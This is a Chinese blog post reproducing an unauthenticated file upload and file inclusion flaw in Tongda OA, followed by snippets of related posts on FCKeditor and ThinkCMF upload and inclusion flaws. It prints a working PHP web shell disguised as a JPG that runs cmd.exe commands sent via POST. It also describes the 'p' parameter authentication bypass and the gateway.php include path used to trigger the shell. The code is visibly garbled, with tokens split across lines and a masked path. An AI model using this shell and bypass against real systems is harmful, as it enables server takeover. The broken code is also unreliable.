通達OA未授權任意檔案上傳和任意檔案包含漏洞復現

2021-10-23 14:00:12 字數 1145 閱讀 1424

建立乙個上傳的頁面

>

>

開啟後,上傳乙個jpg,內容如下

<?php 

//儲存為jpg

$phpwsh

=new

com(

"wscript.shell")or

die(

"create wscript.shell failed!");

$exec

=$phpwsh

->

exec

("cmd.exe /c "

.$_post

['cmd'].

"");$stdout

=$exec

->

stdout()

;$stroutput

=$stdout

->

readall()

;echo

$stroutput

;?>

上傳後,得到結果如下

auth.php是登入相關的邏輯操作,修復前,只要p引數不為空就可以繞過auth.php的身份驗證,可以利用跟這個邏輯漏洞來上傳任意檔案。

上傳後的檔案不在根目錄中,需要進行檔案包含才可以利用

ispirit/inte***ce/gateway.php

與上傳相反,沒有p引數即可無需驗證

在右圖的47行中,有include_once函式對url引數中的檔案進行包含,並且url引數沒有進行相關過濾操作,所以可以任意讀取url引數中的檔案。

fckeditor任意檔案上傳漏洞

1.建立.htaccess檔案,內容如下 htaccess檔案可以用來設定某個目錄和某個目錄的子目錄的許可權,以上內容的意思是將副檔名是 php.gif 的檔案解析成php 2.使用如下url,上傳上面建立的的.htaccess檔案 通過這一步上傳,上傳目錄的 php.gif 檔案apache會按照...

任意檔案上傳漏洞修復

一 include dialog select soft post.php檔案,搜尋 大概在72行的樣子 fullfilename cfg basedir.activepath.filename 修改為if preg match php pl cgi asp aspx jsp php5 php4 p...

ThinkCMF框架任意檔案包含漏洞學習復現小記

跟隨大佬學習,了解學習了thinkcmf任意檔案包含漏洞,並進行了一次滲透,下面來寫個學習筆記記錄一下 thinkcmf x1.6.0 thinkcmf x2.1.0 thinkcmf x2.2.0 thinkcmf x2.2.1 thinkcmf x2.2.2 任何人在無需任何許可權情況下,通過構...